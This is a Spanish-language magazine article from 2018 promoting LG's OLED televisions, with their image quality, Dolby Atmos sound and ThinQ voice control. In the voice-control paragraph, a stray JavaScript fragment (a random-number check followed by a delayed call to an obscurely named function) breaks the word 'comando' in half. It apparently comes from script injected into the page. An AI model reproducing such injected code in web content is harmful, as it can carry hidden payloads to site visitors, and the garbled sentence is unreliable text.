Una mejor experiencia con OLED para ver tus series favoritas

    Una mejor experiencia con OLED para ver tus series favoritas

    Cambia tu serie favorita hablándole a tu control remoto.

    Autor: Redacción Maxim 26 abril, 2018


    FOTO: Cortesía de LG

     

    Te imaginas ver tus series favoritas con una experiencia verdaderamente cinematográfica y con la mejor calidad de imagen.

     

    LG toma ventaja de su legado como el pionero de tecnología de pantallas OLED con la familia de televisores W8, G8, E8 y C8 OLED, que ofrecen la mejor representación de imágenes y colores más precisos desde prácticamente cualquier ángulo de visión. Además, con el sonido Dolby Atmos y una calidad de imagen óptima, los televisores de LG ofrecen a los consumidores una experiencia de visualización envolvente.

     

    ¿UN CENTRO DE ENTRETENIMIENTO INTELIGENTE?

     

    Tener un televisor inteligente sería una gran idea para disfrutar mejor tus programas sin necesidad de mover un dedo ¿no crees? Ahora, un comandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando de voz es suficiente para buscar el soundtrack de la película, apagar el televisor y más.

     

    Los televisores OLED de LG tienen la funcionalidad AI integrada en los sets, con esto puedes hablar directamente al control remoto para disfrutar de la última tecnología en asistencia de voz.

    Así, ThinQ® de LG ofrece una experiencia interactiva mejorada. Al funcionar como centros inteligentes de información para el hogar, los televisores LG ThinQ® pueden acceder a otros productos inteligentes para el hogar, como aspiradoras robóticas, aires acondicionados, luces inteligentes, altavoces inteligentes y muchos otros dispositivos que se conectan al televisor a través de Wi-Fi o Bluetooth. Ahora sí, maneja todo desde un sólo lugar.

     

    Ahora que ya lo sabes, elige tu serie y ponle play.

     

     

     

    Temas relacionados con esta nota: , , , , ,

Cambia tu serie favorita hablándole a tu control remoto.